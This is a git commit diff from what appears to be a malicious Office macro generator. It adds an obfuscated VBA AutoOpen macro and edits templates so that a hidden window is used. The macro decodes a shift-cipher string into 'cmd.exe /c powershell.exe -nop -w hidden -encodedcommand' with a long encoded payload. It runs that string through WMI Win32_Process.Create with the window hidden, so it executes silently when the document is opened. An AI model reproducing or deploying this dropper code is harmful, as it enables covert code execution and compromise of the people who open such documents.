Updated WMI to hide window
parent
e2ee427a3b
commit
71cc07b2ec
|
@ -0,0 +1,135 @@
|
|||
|
||||
|
||||
|
||||
|
||||
|
||||
Sub AutoOpen()
|
||||
Dim qrMsPEfZZxQtuT As String
|
||||
Dim uqESZvZWU As Object
|
||||
Dim YcCVBPFAXEgRZJKMArhrq As Integer
|
||||
Dim ilttqSzePLIB As String
|
||||
Dim PSxgNvQbzD as String
|
||||
|
||||
YcCVBPFAXEgRZJKMArhrq = 6438
|
||||
PSxgNvQbzD = CALGUwZkIjKgysDPyM("BpYPdusgPtDSBdRIRfluMvJ")
|
||||
Set uqESZvZWU = GetObject(PSxgNvQbzD)
|
||||
ilttqSzePLIB = CZExVbvjSNaN("BpYPdusgPtDSBdRIRfluMvJ")
|
||||
ilttqSzePLIB = XItmeSMLzMDoEt(uqESZvZWU, ilttqSzePLIB, YcCVBPFAXEgRZJKMArhrq)
|
||||
End Sub
|
||||
|
||||
Function CZExVbvjSNaN(wCqKU As String) As String
|
||||
Dim gcGCwobmOwetmyCIXerNTAZ As String
|
||||
Dim yntZzVvZZccetYiLF As String
|
||||
Dim wzfXnd As String
|
||||
wzfXnd = "fpg1h{h#2f#srzhuvkhoo1h{h#0qrs#0z#klgghq#0hqfrghgfrppdqg#MDE}DG3DWjEoDKfDOTESDJLDdjEoDJPDgDDjDHnDWzDxDH3D]TEwDJ;DfjE8DIPDgDE|DJXD\TEwDFjDODEeDHPDezExDK\D]TE|DKTD[TD9DGrDUjE|DJ;DeTEFDJHDfzEoDG\DQDEWDKT"
|
||||
Dim mnZGckHXWkbNuHfHEs As String
|
||||
mnZGckHXWkbNuHfHEs = "DfjEsDJ7D]zDrDFLDVDD3DKPDVTEEDHHDTTEEDHHDTTEEDHHDTTEPDGHDZDEkDIfDOzElDH;DTjETDFvDVDETDGjDVzE]DILDUjEEDHXDgTE|DGTD\jEzDJ;DYTEGDH\DUDEODKTDNzE}DKLDeDEsDGHD]jEkDKjDdTDzDIPDWTE3DH3DVzERDHfDYjEODHTDgjESDKT"
|
||||
Dim EudNeKPlPnTvhZmQa As String
|
||||
EudNeKPlPnTvhZmQa = "DgjD8DGnDXjD4DHzD]DE4DKDDgDDzDGPDhDEUDHzDgjEEDHnDUTEYDH;DYDEQDJPDWzEkDIrDYTE8DJHDYjEZDG\D\jDzDJ3DXzDzDGfD]zEvDHTDeDE8DKHDVjDuDKfDVTEWDJ7DUjEJDHvDfDE8DGTDfDEyDIPDgTEZDH;DNzEkDIPDeTD{DKHDUjExDKnDPjEqDGf"
|
||||
Dim WTksSoRlwX As String
|
||||
WTksSoRlwX = "DYzEsDKfD]DEODKDD]DElDIjDRTErDHzDYDEMDJjDXDEqDGDDUDD4DHvDPzE\DILDhDE9DGXDPjEJDJXDPTE8DJjDOzD|DJzDVzDzDJrDVTEkDI\DfTENDIDDhTENDHPDXzEuDHvD]jD5DJjD\zE\DKHDZTE3DGTDVzDyDIHDTzE5DHvDZjEPDHTDPDE4DGLDezDzDKX"
|
||||
Dim XOKupOohTiUtGeW As String
|
||||
XOKupOohTiUtGeW = "DZDE8DJ;DPDEqDHHDYjE8DJvDhjEnDH\DPjE[DKjDUTE4DIrDgDD6DJnDQDD7DJTDhTD5DIDDgjEYDJvDRDEvDGPDfDEuDGTDeDEGDJfDWDE{DKLDdjEsDJrD]zEkDInDfjE\DGXDZDE7DJjDgjE|DGDDfTE|DJTDQjEyDHzDZjEYDF;DeDEMDKXDeDD4DJvDQjEJDKn"
|
||||
Dim ZJdTS As String
|
||||
ZJdTS = "DgjEQDJrDPjEWDHjDWTE|DInDPzE]DHLDUDE8DIPDVDEXDIfDUjEtDJHDWzEPDH3DdTE]DIfDRDD5DJvDfDE5DGfDQTEzDG\DfjETDKLDOzEODHzDYDETDI\DWDEsDHjDeTEqDKHD]TE]DJjDdzERDITDWjEIDH3DQTEZDIjD]jEwDJ3DXjE7DJPDWzEHDGHDgTE{DKH"
|
||||
Dim VSGtpb As String
|
||||
VSGtpb = "DXjD{DJ3DNzE8DHnDXTEkDGXDdzEdDH3DQjD8DInDhTEMDKjDdTD6DJLDgTE7DGjDfDD{DHXD]DD{DI\DXDEqDIfDPDDuDJzD\TELDK\DVzElDGjDPjEQDIrDVzEdDJPDUzEqDKHDWDETDKXDTTEHDHXDezEUDI\DXDEZDH3DPDD8DKXDVjEVDG\DfDEnDJXDdTELDJ7"
|
||||
Dim toAFlzFGwBIhanWofu As String
|
||||
toAFlzFGwBIhanWofu = "D\TEoDIfDYDERDJrDRDE{DH7DTTEqDGnDhTEZDKfDVzD4DGXDWDD5DInDeTE3DIPD]jD7DJTDfzEKDJ3DXTEkDGLDTzESDJPDUDE4DJjDQjEyDIjDZDEzDF;DezEXDHTDYzD4DJ3DPDEmDKnD\TEqDG\DdzE3DJ\DYDE7DF;D]DD8DKjD\jEnDH;DQzEKDHzDUTD}DHf"
|
||||
Dim FYCKEzBdOtzBx As String
|
||||
FYCKEzBdOtzBx = "DfTDyDJzDWDD6DKPDhjEtDIHDQDE\DJvDXjEGDGPDfjE{DIfDNzE{DI\DfTEGDHvDYTEYDKfD]DEPDKXDfDEUDHHDOzEZDJzDZTEzDIPDQDE4DGXDgjEKDIPD]zEtDGHD\TE\DKfDXTE}DGXDfjE3DITD\zEwDJ3DeDEEDGDDfDEqDHvD]jE6DHTD]jEJDGTDWzDyDIr"
|
||||
Dim lObUCjU As String
|
||||
lObUCjU = "DUDE{DHPDPjEYDJXDgTE[DG\DNzE[DHLDhTE5DIDDZDEIDHfDQjEZDGjDVzE8DKDDNzD3DJrDdjE8DHrDWTE7DH3DRTD6DKDDXzD4DHrDXjErDIrDfDEGDGXDdTETDGjD]jExDGDD\zEJDKnDUjEXDHrDWzE{DHLDRDEVDF;DUDEzDKnDVzD}DITDWjETDH\DezD4DJX"
|
||||
Dim mxATuPixshP As String
|
||||
mxATuPixshP = "DWjErDJzDRTEsDJvDQDE3DJTD]TEmDILDgDEoDJPDhDEyDHLDdzEXDJ3DXjEnDIXDUjEVDITDdjE6DJXDYTEZDHnDQzE6DKHDTjEKDJnDRDD4DJTDfzEZDIrD]jENDGfDQzE7DHfDezErDKnDhTE6DJ\DUTEFDJHDTTEYDKjDezEpDFvDfzEXDH;DVjEIDITDYzD{DG\"
|
||||
Dim rbJHrFGH As String
|
||||
rbJHrFGH = "DVDEoDJ;DTzEqDH3DeTD}DHPDfzD4DJHDXTDzDKLDXTEIDF;DYTE7DHTDXTD5DJ7DPjD5DH7DgjEMDH\DWDEPDHjDTTEnDHLDYzE4DJ3DVDEuDHrDWjD|DIfDdjEIDKDDQTEzDIPDdzEJDJXDXTEJDGfDVDEsDHXDXTEsDJ7DdTEzDJ\DfDEHDGPDYTD6DHnDVjElDH7"
|
||||
Dim oLwCJ As String
|
||||
oLwCJ = "DhDEMDHXDOzEsDH\DgjEyDKLDdzEFDG\DgjEPDJfDfzE5DJvDVDD4DJ;D]zD}DKPDTjErDKHDUzD4DKDDYDElDHTDXDEIDHnDeDE|DITDXTE]DJ;D\zElDHLDZjEQDGXDVjEFDJ\DYjEZDITDWTE{DInD\zDuDInDQTEMDHfDdzELDIDDezEKDJTDTzEEDKTDYDEVDJv"
|
||||
Dim xUdZsFglujHSJ As String
|
||||
xUdZsFglujHSJ = "DVDEtDJvDOzEUDF;DTTDzDITDXDEwDH\DXTD|DGPDXzD|DJ7DWDEvDHTDVDEJDJHDXDEKDKPDXTETDGHDQDEdDJjDXzEmDJLDhDErDJjDhDEPDGHDZDD8DIHDNzENDIXDfTEWDH\DXjEJDIfDVjD4DHTDWzEvDHnDZTEEDH3DWDEwDIHD\TEmDI\DdTE5DJ;DXTEkDKD"
|
||||
Dim BUOFvFtXpWYOxqwsmCr As String
|
||||
BUOFvFtXpWYOxqwsmCr = "DVzEdDJ\DXjERDGXDOzEZDH;DOzExDJvDgjEWDITDejEwDIfD]jELDJrDPjEzDKjD\TEuDGTDWjE6DGTDhTEWDKDDdTE]DGDDezD3DG\DgzEnDGHDPzEQDHfDXDEyDJ\DTTEwDKfDPTE\DKrDdDEKDJrDdTEqDGHDQjE[DJ;DZjE\DJnDWzD8DJvD]TD|DKjDPTEyDHn"
|
||||
Dim SOtEKNXgEZHXFGCxhWp As String
|
||||
SOtEKNXgEZHXFGCxhWp = "DejEwDJ7DYDD3DKjDPzEWDJXDeTEXDGXDQTErDGfD]TEHDKLDgzEtDI\DeTE8DHvDhTEqDJ\DhTE4DJ\DZDEUDKnDVDElDKPD\zE3DHPDgjD{DGLDQDEUDGLDhjE3DGfDNzD5DJHDWDD6DHTDYzD6DKHD\jEYDJ3DXTELDJ\DXDEmDKPDPDElDILDWTE|DKTDNzE6DJH"
|
||||
Dim ZrrulF As String
|
||||
ZrrulF = "DfjD6DILDgTEHDKrDQDEqDInDfzESDJTDWTE[DJTDQTE7DHXDWzEuDF;DRTEODKTDgTE4DGnDfzEQDJrDXDE7DILDYDE}DHrDgjEvDGDDfTERDIPDXTD3DI\DdTD5DI\D]TEQDJ\D]DEMDJHDTzE4DJnD]jDzDIPDdzD5DGfDWDD8DIXDhDE5DIfDYTEJDKTDQzElDIH"
|
||||
Dim TatdI As String
|
||||
TatdI = "DXDD3DJPDdzD{DJXD\jEdDIXDVDE{DGPDUzErDH7DdDE5DKrDXjE|DIrDYTD|DG\DhjELDHnDdjEGDK\DXzE9DH;DTzD5DFvDRDD4DIHDZTE]DJfDTjEVDGXDdTEkDKnDTzEKDHTD]DE}DGHDfzEvDJ7DfjE4DJjDeDEdDIrDZDEVDIjDhDEoDGHDPjEZDIjDOzEkDKT"
|
||||
Dim CiIGaZrrUJq As String
|
||||
CiIGaZrrUJq = "DVjDyDK\DgzDzDGTDZjEsDIfDejErDI\DgDE|DGHDYzEqDG\DXDE[DGjDUjE}DHfDUDErDHTDfTD8DKPD\TEwDHvDdjEYDJ\DdzEEDJ\DeTEtDIfDhTE\DJLDeTEHDHjDXzEvDGLDejEGDHfDOzEnDGfDfDEwDG\D\TEvDGPDWTEIDJHDPjE8DKjDRTExDGTDOzEoDGX"
|
||||
Dim ODsyVBQ As String
|
||||
ODsyVBQ = "DYzEIDInDeDEmDHXDZjE[DKLD\jEyDKHDdzExDHLDYjE5DGnDPzEQDKnDfTEtDInD]TEoDGXDRDEkDH\DZjD4DH;DVDERDK\DQzD5DJXDYDEqDIfD]zDyDH7DWDEoDJ;DgDEzDJ3DWzEpDFvDWjEJDKTD\zEoDJ7D\jENDGXDWTE|DHTDgzEdDGTDWTEzDGLDYDETDHX"
|
||||
Dim TCUdXv As String
|
||||
TCUdXv = "DQjEwDG\D]jE4DH3DWDENDJnDOzERDKjDezE6DIrDPTEpDIXDWDD3DGLDgzESDGPDTTEEDHzDgTEKDJ;DOzEzDJ3DgzEwDJLDZjEoDK\DZjD|DGPDWjE{DF;DdzD8DJ\DdjE]DJPDWTEmDKXDXTD6DKHD]jEGDJzDZDEVDGfDhDEvDJrDfTE9DIfDXDEoDGXDVjE{DF;"
|
||||
Dim KMoGxtpQUro As String
|
||||
KMoGxtpQUro = "DPjE6DKnDNzEkDJ7DZDErDGDDPzDzDITDWjEGDGXDYjEkDKDDWDE{DKHDdjE4DJzDdDElDGfDdTE]DF;DPjEJDGTDUDDyDFvDdDDzDGfDhDEsDIjD\zDyDI\DQjEMDG\DVzEpDHnDUjENDGHDejE|DHvDeDEWDInDUTEqDKPDOzE[DH;DTjEsDGPDRDD|DJHDNzEZDJX"
|
||||
Dim rocwFyWRtPwPRPha As String
|
||||
rocwFyWRtPwPRPha = "DUDEKDIPDZjEoDHTDfTEkDHTDWTEFDIjDNzEkDHjDdjEkDKjDYjEIDHnDPjEVDH7D\jE5DHjD\jEXDHnDfDEMDJXDTjEnDGPD\TEHDGLDVDE{DHfD]TEXDJ\DVjEKDGDDQTE3DJXDeDD7DILDYDD8DJzDPTEqDIjD]TEmDGjDQDEkDKnDhjD|DJXDhjErDGXDejEuDGD"
|
||||
Dim hPgycfYYOoBWU As String
|
||||
hPgycfYYOoBWU = "DVTEVDKXDgzEUDJTDhTDzDKjDRDE9DJHDZjEWDGPDRDEkDHHD]zEIDI\DfTEKDG\D]zD{DHHDYjEMDJHDgTE6DJ3DYzD4DKLD]jEUDG\DPjEHDIXD]jD4DIjDgTE3DGnDejEqDJjDYTErDK\DWjEkDJTDQDE8DH7DhjD|DH7DUzD|DGTDeTESDJ7DYTEPDJLDPjEHDJP"
|
||||
Dim XeZIz As String
|
||||
XeZIz = "DfTEKDGnDgjEMDK\DQzEmDJXDVzE3DJTDUzEIDIPDQjD3DHjDYTD6DHLDYjD6DH7DXjEsDG\DRTEmDKnDRDE[DITDgzE\DIDD\jD6DJXDQTE[DGnDNzEtDKXDUDDzDJnDfDEsDGHDXzEmDHnD\TE3DKfDgjEYDGfDfTDyDK\DRTEyDKXDTjD}DKPDTjE7DK\DWTEMDIj"
|
||||
Dim rNZPTj As String
|
||||
rNZPTj = "D]TEqDJHDZjD3DKHDZDEuDGPDQDE3DIfDXDE|DG\DgzE}DIfD\zE[DJrD\TD5DGTDXDEZDHnDOzEYDGnDhTEwDHjDezEqDHzDVDEuDI\DTzEmDIHDQTD7DHvDWzEwDK\DYTE5DKXDdTEkDH3DUDEuDJzDUDE\DGDDTTD8DHjDWTEKDKnDYzELDJjDPTEzDIPDgjEpDHP"
|
||||
Dim vjBIpylQJaWcNEJuYfT As String
|
||||
vjBIpylQJaWcNEJuYfT = "D]jEYDJ\DVDEpDKnDPDD8DJ\DVDEtDHTDTTE6DGXDUjE{DHPDezEMDHfDYDEkDGHDVDETDJvDVjEzDGHDQzEODKXDZjE8DGDDVDEdDKrDYDD5DIfD\zExDJ7DfTD6DF;DYzE[DKjDXDE[DJrD]jEzDJHDYzEtDKrDejDzDHfDQTEpDJzDUjETDHzDQTEMDITDhTEZDIH"
|
||||
Dim OdDSGBVqnrmBACID As String
|
||||
OdDSGBVqnrmBACID = "D\jDuDIHDUzEkDJjDZDD4DIDDPjERDGnDfjEMDF;DhDD{DJLDNzETDGnDZTDuDGnD]jE9DJzDRTEIDF;DQjD4DGnDUDEvDHnDWDE6DGXDOzD}DK\D]zEnDJTDOzE7DGPDdTEQDJHDZTEWDIfDTTD{DJ;DXTD8DKfDeTEuDKfDhTElDGDDZDE{DHfDVTEFDJ7D\zDuDH;"
|
||||
Dim WNIquUYGkUpecPQbus As String
|
||||
WNIquUYGkUpecPQbus = "DZjEzDKnDVDEGDGHDfzEmDJ7DUzE5DH7DQzEyDJLDhjE{DKfDeDEWDIrDYTEtDFvDeDEYDKPDPjD{DJPDezEdDIHDgzENDGXDdDE6DHvD]DEpDJzDTjE}DGnDeTErDIXDUDEsDIjDPTD4DGnDXzEFDIfDRDEHDJPDXTE3DGDDhjE3DHXDgTE3DHvDfzE9DKDDXjEPDKL"
|
||||
Dim qDnmSyPstQKrJ As String
|
||||
qDnmSyPstQKrJ = "DVDE8DITD\jEuDHPDYTEJDHLDXTEPDH3DTTE5DJfD]TDuDHXDYTEpDGnDYTEuDJrDNzEmDKLDRDEyDJXDYDEMDJvDZjE5DKnDezEHDJHDeDEQDInD]TD5DGnD\TE]DJfDYjD8DJvD\zEMDInDUjEMDJ3DWzErDIXDYDEIDKPDXDEmDGPDZjEQDJPDRTEJDITDVTERDHH"
|
||||
Dim xgLjcClnFUTCUj As String
|
||||
xgLjcClnFUTCUj = "DTTEEDG3DLjDsDFnDRzEMDHXDZDDjDFjDWjEoDKfDOTESDJLDdjEoDJPDgDDjDHnDWzDxDIPDgDE|DJXD\TEwDILD]TEkDJTD]TE|DFjDWjEoDKfDOTESDJLDdjEoDJPDgDDjDHnDWzDxDHPDezEwDKDDfjEoDKPDfzEsDJ;DejDxDHfDhjEsDKDDXzE3DKLD]TEkDJ3"
|
||||
Dim IEgSKWOU As String
|
||||
IEgSKWOU = "DNDDnDKPDODEeDHnDWzDxDHPDezEwDKDDfjEoDKPDfzEsDJ;DejDxDHPDezEwDKDDfjEoDKPDfzEsDJ;DejEQDJ;D]DEoDI3DRjD9DHTD]TEmDJ;DeTEzDKLD]TE}DKPDNTDsDFnDOjEVDJXD\TEnDITDezEIDJ7D]DDrDFnDRzD@"
|
||||
|
||||
gcGCwobmOwetmyCIXerNTAZ = wzfXnd & mnZGckHXWkbNuHfHEs & EudNeKPlPnTvhZmQa & WTksSoRlwX & XOKupOohTiUtGeW & ZJdTS & VSGtpb & toAFlzFGwBIhanWofu & FYCKEzBdOtzBx & lObUCjU & mxATuPixshP & rbJHrFGH & oLwCJ & xUdZsFglujHSJ & BUOFvFtXpWYOxqwsmCr & SOtEKNXgEZHXFGCxhWp & ZrrulF & TatdI & CiIGaZrrUJq & ODsyVBQ & TCUdXv & KMoGxtpQUro & rocwFyWRtPwPRPha & hPgycfYYOoBWU & XeZIz & rNZPTj & vjBIpylQJaWcNEJuYfT & OdDSGBVqnrmBACID & WNIquUYGkUpecPQbus & qDnmSyPstQKrJ & xgLjcClnFUTCUj & IEgSKWOU
|
||||
gcGCwobmOwetmyCIXerNTAZ = IMahev(gcGCwobmOwetmyCIXerNTAZ)
|
||||
CZExVbvjSNaN = gcGCwobmOwetmyCIXerNTAZ
|
||||
End Function
|
||||
|
||||
Function pONpYabIh() As String
|
||||
Dim RoPgdoevhhFCaiNBT As String
|
||||
RoPgdoevhhFCaiNBT = IMahev("zlqpjpwv=urrw2flpy5")
|
||||
pONpYabIh = RoPgdoevhhFCaiNBT
|
||||
End Function
|
||||
|
||||
Function XItmeSMLzMDoEt(DitexWndjefju As Object, AoUcUHL As String, MaqkRfyEkIEOdd As Integer) As String
|
||||
Dim CoGsxQyIbBgiQjA As String
|
||||
Dim ApcjiM As Integer
|
||||
Dim mJkTVsNh As Integer
|
||||
Dim JCSnEYzttQSwVdV As Integer
|
||||
ApcjiM = 8
|
||||
CoGsxQyIbBgiQjA = AoUcUHL
|
||||
If (MaqkRfyEkIEOdd > ApcjiM) Then
|
||||
Set SujUrYCEsfPsr = GetObject(pONpYabIh())
|
||||
Set wugrVNYqPPGxXSamhLnkS = SujUrYCEsfPsr.Get(IMahev("Zlq65bSurfhvvVwduwxs"))
|
||||
Set qNgUfERIEAKODVyxb = wugrVNYqPPGxXSamhLnkS.SpawnInstance_
|
||||
ApcjiM = MaqkRfyEkIEOdd - MaqkRfyEkIEOdd
|
||||
ApcjiM = ApcjiM + 12
|
||||
qNgUfERIEAKODVyxb.ShowWindow = ApcjiM
|
||||
JCSnEYzttQSwVdV = DitexWndjefju.Create(CoGsxQyIbBgiQjA, null, qNgUfERIEAKODVyxb, mJkTVsNh)
|
||||
End If
|
||||
CoGsxQyIbBgiQjA = "hNlKxakwGfktPoqaeyQLcP"
|
||||
XItmeSMLzMDoEt = CoGsxQyIbBgiQjA
|
||||
End Function
|
||||
|
||||
Function CALGUwZkIjKgysDPyM(DlzhqGHNiEuPevnJzPtk As String) As String
|
||||
Dim sPMdZm As String
|
||||
sPMdZm = IMahev("zlqpjpwv=Zlq65bSurfhvv")
|
||||
CALGUwZkIjKgysDPyM = sPMdZm
|
||||
End Function
|
||||
|
||||
|
||||
Function IMahev(xwMbMkcLWXnfGMLtZe As String) As String
|
||||
Dim yPccVGSEMWlIDSPolPnWurpD As Long
|
||||
Dim uXFhTeVPXvr As String
|
||||
Dim mJuCgbCXWnphqwwoRWoNWyzB As Integer
|
||||
mJuCgbCXWnphqwwoRWoNWyzB = 3
|
||||
For yPccVGSEMWlIDSPolPnWurpD = 1 To Len(xwMbMkcLWXnfGMLtZe)
|
||||
uXFhTeVPXvr = uXFhTeVPXvr & Chr(Asc(Mid(xwMbMkcLWXnfGMLtZe, yPccVGSEMWlIDSPolPnWurpD, 1)) - mJuCgbCXWnphqwwoRWoNWyzB)
|
||||
Next yPccVGSEMWlIDSPolPnWurpD
|
||||
IMahev = uXFhTeVPXvr
|
||||
End Function
|
File diff suppressed because one or more lines are too long
Binary file not shown.
Binary file not shown.
Binary file not shown.
|
@ -1,7 +1,7 @@
|
|||
[use:payload_wrapper]
|
||||
[use:exec]
|
||||
[use:init_wmi]
|
||||
|
||||
[use:init_properties]
|
||||
Sub AutoOpen()
|
||||
Dim var1 As String
|
||||
Dim var2 As Object
|
||||
|
@ -27,17 +27,30 @@ Function payload_wrapper(payload_wrapper1 As String) As String
|
|||
payload_wrapper = payload_wrapper2
|
||||
End Function
|
||||
|
||||
Function init_properties() As String
|
||||
Dim init_properties1 As String
|
||||
init_properties1 = decode("{[winmgmts:root/cimv2]}")
|
||||
init_properties = init_properties1
|
||||
End Function
|
||||
|
||||
Function exec(exec1 As Object, exec2 As String, exec3 As Integer) As String
|
||||
Dim exec4 As String
|
||||
Dim exec5 As Integer
|
||||
exec5 = [smallint1]
|
||||
exec4 = exec2
|
||||
Dim exec4 As String
|
||||
Dim exec5 As Integer
|
||||
Dim exec13 As Integer
|
||||
Dim exec14 As Integer
|
||||
exec5 = [smallint1]
|
||||
exec4 = exec2
|
||||
If (exec3 > exec5) Then
|
||||
exec5 = exec3 - exec3
|
||||
exec1.Create(exec4)
|
||||
End If
|
||||
exec4 = "exec6"
|
||||
exec = exec4
|
||||
Set exec10 = GetObject(init_properties())
|
||||
Set exec11 = exec10.Get(decode("{[Win32_ProcessStartup]}"))
|
||||
Set exec12 = exec11.SpawnInstance_
|
||||
exec5 = exec3 - exec3
|
||||
exec5 = exec5 + 12
|
||||
exec12.ShowWindow = exec5
|
||||
exec14 = exec1.Create(exec4, null, exec12, exec13)
|
||||
End If
|
||||
exec4 = "exec6"
|
||||
exec = exec4
|
||||
End Function
|
||||
|
||||
Function init_wmi(init_wmi1 As String) As String
|
||||
|
|
|
@ -1,6 +1,7 @@
|
|||
[use:payload_wrapper]
|
||||
[use:exec]
|
||||
[use:init_wmi]
|
||||
[use:init_properties]
|
||||
|
||||
Sub AutoOpen()
|
||||
Dim var1 As String
|
||||
|
@ -24,14 +25,27 @@ Function payload_wrapper(payload_wrapper1 As String) As String
|
|||
payload_wrapper = payload_wrapper2
|
||||
End Function
|
||||
|
||||
Function init_properties() As String
|
||||
Dim init_properties1 As String
|
||||
init_properties1 = decode("{[winmgmts:root/cimv2]}")
|
||||
init_properties = init_properties1
|
||||
End Function
|
||||
|
||||
Function exec(exec1 As Object, exec2 As String, exec3 As Integer) As String
|
||||
Dim exec4 As String
|
||||
Dim exec5 As Integer
|
||||
Dim exec13 As Integer
|
||||
Dim exec14 As Integer
|
||||
exec5 = [smallint1]
|
||||
exec4 = exec2
|
||||
If (exec3 > exec5) Then
|
||||
Set exec10 = GetObject(init_properties())
|
||||
Set exec11 = exec10.Get(decode("{[Win32_ProcessStartup]}"))
|
||||
Set exec12 = exec11.SpawnInstance_
|
||||
exec5 = exec3 - exec3
|
||||
exec1.Create(exec4)
|
||||
exec5 = exec5 + 12
|
||||
exec12.ShowWindow = exec5
|
||||
exec14 = exec1.Create(exec4, null, exec12, exec13)
|
||||
End If
|
||||
exec4 = "exec6"
|
||||
exec = exec4
|
||||
|
@ -40,5 +54,5 @@ End Function
|
|||
Function init_wmi(init_wmi1 As String) As String
|
||||
Dim init_wmi2 As String
|
||||
init_wmi2 = decode("{[winmgmts:Win32_Process]}")
|
||||
init_wmi = init_wmi2
|
||||
init_wmi = init_wmi2
|
||||
End Function
|
||||
|
|
Loading…
Reference in New Issue